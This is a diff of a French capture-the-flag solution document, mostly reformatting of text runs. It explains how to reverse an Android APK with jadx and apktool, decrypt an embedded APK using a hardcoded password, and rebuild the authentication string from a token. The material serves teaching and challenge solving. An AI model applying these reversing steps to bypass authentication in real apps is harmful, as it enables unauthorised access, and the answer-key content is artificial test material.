--- a/challenge_reverse_web/solution.docx
+++ b/challenge_reverse_web/solution.docx
@@ -42,64 +42,11 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Rq</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> : c’est une façon de faire, il est aussi possible de faire du </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mitm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, de la redirection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dns</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> pour dumper les requêtes réseau de l’application</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, ou de l’analyse dynamique de l’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> via </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>adb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (compilé en </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>debug</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) etc.</w:t>
+      <w:r>
+        <w:t>Rq : c’est une façon de faire, il est aussi possible de faire du mitm, de la redirection dns etc pour dumper les requêtes réseau de l’application</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, ou de l’analyse dynamique de l’apk via adb (compilé en debug) etc.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -145,37 +92,13 @@
         <w:ind w:left="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">L’application est une </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>webapp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> qui se connecte à un site web et fourni quelques fonctionnalités native</w:t>
+        <w:t>L’application est une webapp qui se connecte à un site web et fourni quelques fonctionnalités native</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>s(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Showtoast</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">). L’application comprend un </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> chiffré qu’elle déchiffre au lancement, et qui fournit une méthode </w:t>
+        <w:t xml:space="preserve">s(Showtoast). L’application comprend un apk chiffré qu’elle déchiffre au lancement, et qui fournit une méthode </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -204,234 +127,22 @@
         <w:ind w:left="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Avec </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jadx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> par exemple :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>webSettings.setUserAgentString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>webSettings.getUserAgentString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">() + </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>" ?</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> id:" + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>getResources</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>().</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>getText</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>R.string.app_name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>toString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">() + "/" + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>getResources</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>().</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>getText</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>R.string.appVersion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>toString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">() + "/" + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>getResources</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>().</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>getText</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>R.string.token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>toString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>());</w:t>
+        <w:t>Avec jadx par exemple :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>webSettings.setUserAgentString(webSettings.getUserAgentString() + " ? id:" + getResources().getText(R.string.app_name).toString() + "/" + getResources().getText(R.string.appVersion).toString() + "/" + getResources().getText(R.string.token).toString());</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -498,95 +209,46 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Récupération </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">En utilisant </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk-tool</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> par exemple :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>java -jar apktool_2.3.4.jar -f d .\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>buyExpress.apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>appcustom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">cd </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>appcustom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>/res/values</w:t>
+        <w:t>Récupération token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t>En utilisant apk-tool par exemple :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>java -jar apktool_2.3.4.jar -f d .\buyExpress.apk -o appcustom</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>cd appcustom/res/values</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -651,15 +313,7 @@
         <w:ind w:left="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">On trouve le </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> à la fin et l’adresse du site internet</w:t>
+        <w:t>On trouve le token à la fin et l’adresse du site internet</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -691,15 +345,7 @@
         <w:ind w:left="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">La fonction identification est importé depuis un </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> chiffré :</w:t>
+        <w:t>La fonction identification est importé depuis un apk chiffré :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -821,84 +467,28 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk-tool</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t> :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Cd </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>appcustom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">/assets </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t>on trouve test-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sec.apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> qui est déchiffré dans le code java, comme vu avec </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jadx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, avec le mot de passe « </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aBeautifulLayOfEncryption</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t> » et le chiffrement AES/GCM/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoPadding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> On remarque que l’IV et le sel sont de 12 et 16 bytes en </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>debut</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> de fichier.</w:t>
+        <w:t xml:space="preserve"> apk-tool :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Cd appcustom/assets </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t>on trouve test-sec.apk qui est déchiffré dans le code java, comme vu avec jadx, avec le mot de passe « aBeautifulLayOfEncryption » et le chiffrement AES/GCM/NoPadding.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> On remarque que l’IV et le sel sont de 12 et 16 bytes en debut de fichier.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1066,8 +656,9 @@
           <w:szCs w:val="20"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>PBKDF2WithHmacSHA256</w:t>
-      </w:r>
+        <w:t>PBKDF2WithHmacSHA</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1076,7 +667,38 @@
           <w:szCs w:val="20"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
         <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>dû aux incompatibilités de sha256 avec les anciennes versions d’android, ancienne capture d’écran).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1140,10 +762,10 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:75.75pt;height:48.75pt" o:ole="">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:78pt;height:48pt" o:ole="">
             <v:imagedata r:id="rId11" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1675713499" r:id="rId12"/>
+          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1677085411" r:id="rId12"/>
         </w:object>
       </w:r>
     </w:p>
@@ -1180,139 +802,37 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>javac</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> .\EncryptorAesGcmPassword.java</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>java -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javac .\EncryptorAesGcmPassword.java</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>cp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> .</w:t>
+        <w:t>java</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>EncryptorAesGcmPassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Avec le fichier </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> dans le même dossier.</w:t>
+        <w:t xml:space="preserve"> -cp . EncryptorAesGcmPassword</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Avec le fichier apk dans le même dossier.</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">ALT : obtenir le </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> déjà déchiffré directement depuis le dossier de l’application </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">(car fournie en mode </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>debug</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>ALT : obtenir le apk déjà déchiffré directement depuis le dossier de l’application </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(car fournie en mode debug)</w:t>
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Rq</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pointless</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>security</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, as a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rooted</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> phone can </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>get</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>here</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> on release </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>too</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Rq : pointless security, as a rooted phone can get here on release apk too</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -1361,23 +881,7 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Une fois le déchiffrement effectué, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jadx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> nous livre les secrets de l’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t> :</w:t>
+        <w:t>Une fois le déchiffrement effectué, jadx nous livre les secrets de l’apk :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1434,15 +938,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">On comprend que le string d’authentification est en fait le sha256 du </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> déjà trouvé, auquel s’ajoute un code fourni par le code http du header de la réponse à la requête GET sur : site + </w:t>
+        <w:t>On comprend que le string d’authentification est en fait le sha256 du token déjà trouvé, auquel s’ajoute un code fourni par le code http du header de la réponse à la requête GET sur : site + </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1450,36 +946,8 @@
           <w:bCs/>
           <w:color w:val="008000"/>
         </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="008000"/>
-        </w:rPr>
-        <w:t>request</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="008000"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="008000"/>
-        </w:rPr>
-        <w:t>get_authentication_code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>?request=get_authentication_code</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1510,130 +978,22 @@
         <w:t xml:space="preserve"> dossier</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smali</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>apk-tool</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) ou en utilisant </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ghidra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t> :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dans " </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>appcustom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>smali</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
